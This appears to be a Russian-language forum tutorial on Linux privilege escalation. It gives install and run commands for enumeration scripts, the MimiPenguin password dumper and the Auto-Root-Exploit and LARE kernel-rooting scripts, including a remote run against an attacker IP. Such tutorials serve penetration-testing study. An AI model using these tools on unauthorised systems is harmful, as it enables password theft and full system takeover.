E
_Emma_
Original poster

Повышение привилегий в Linux
— Это сложное слово означает повышение привилегий,используя уязвимости в ОС или ПО,позволяет получить доступ к ресурсам которые обычного защищены.
PXEnum
Функция перечисления - является основной задачей данного скрипта.Скрипт отыскивает всю доступную информацию о система.Команды скрипта позволяют быстро находить хеши паролей,содержания директорий,сведения о системи,наличие серверов ,приложений,соеденений,пользователей.
Не требует root прав.Скачиваем скрипт командой ниже:
$ wget
Установка PXEnum:
$ git clone
$ cd PXEnum/
$ chmod +x PXEnum.sh
$ bash PXEnum.sh
Другой вариант запуска PXEnum:
$ sh PXEnum.sh
MIDA Multitool
Другой интересный инструмент — , созданный на базе менее популярных собратьев и , но предлагающий гораздо больше возможностей.
По воле разработчика MIDA Multitool объединяет в себе отдельные функции своих предшественников, а именно:
- SysEnum — Bash-скрипт, предназначенный для получения основной информации о системе, включая следующие данные: текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы;
- RootHelper — призван помочь в деле эскалации привилегий в системе, которая была скомпрометирована, при помощи выполнения ряда перечислений и использования доверительных сценариев.
$ git clone
$ cd Bash-Kit-Multitool
$ chmod +x bashkit.sh
Запускаем скрипта MIDA Multitool :
$ /.bashkit.sh

Меню выбора действий после запуска MIDA Multitool
Информация о системе

Данные об учетных записях в текущей системе
MimiPenguin
Задача данного скрипта - сброс пароля на вход в систему.Если так можно выразиться это аналог утилиты mimikatz для дампа пароля в Windows
Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), Apache 2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и OpenSSH-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin нередко становится частью эксплоитов под Linux, так что тулза очень и очень востребована.
Установка MimiPenguin
$ git clone

Окно терминала, отображающее процесс установки MimiPenguin
Запускаем скрипт,перейдя в его директорию
$ cd mimipenguin
$ ls –a
$ chmod +x mimipenguin.sh
$ ./mimipenguin.sh

Результат работы MimiPenguin — все пароли как на ладони
Auto-Root-Exploit
Скрипт выполняет единственную цель получить root на текущую учётную запись с помощью известных багов.Поддерживает версия ядра Linux Kernel 2.6 - 4.8.0-41-generic
Устанавливаем Auto-Root-Exploit
$ git clone
$ cd Auto-Root-Exploit
$ chmod +x autoroot.sh
Проверка версии ядра
<span class="pln">$ uname </span><span class="pun">–</span><span class="pln">a</span>

Получение сведений о версии ядра ОС в Kali Linux
Использование
$ bash autoroot.sh N
for kernel version 2.6 all
bash autoroot.sh 2
for kernel version 3 all
bash autoroot.sh 3
for kernel version 4 all
bash autoroot.sh 4
for freebsd & openbsd all
bash autoroot.sh bsd
for apple macos all
bash autoroot.sh app
for kernel 2.6,3,4 bsd & app all
bash autoroot.sh all

Стартовое меню выбора в Auto-Root-Exploit

Результат работы Auto-Root-Exploit — получение root-прав на систему
LARE
На конец ещё один лёгкий скрипт,находя уязвимости в ядре ОС предоставляет root удалённо с атакующей машины.Использует локальные эксплойты для получения root для версий ядра Kernel v2.6 - v4.8
Устанавливаем скрипт LARE
$ git clone && cd LARE
$ chmod +x LARA.sh
Локальный запуск LARE
$ LARE.sh -a
или
$ ./LARE.sh -a

Запуск LARE на локальной машине
Для запуска скрипта целевой машины в сети:
$ LARE.sh -l [Attackers-IP]

Атака на удаленную машину в локальной сети
Запуск производится с машины подключенной к базе эксплойтов Git Hub
$ LARE.sh -l or ./LARE.sh -l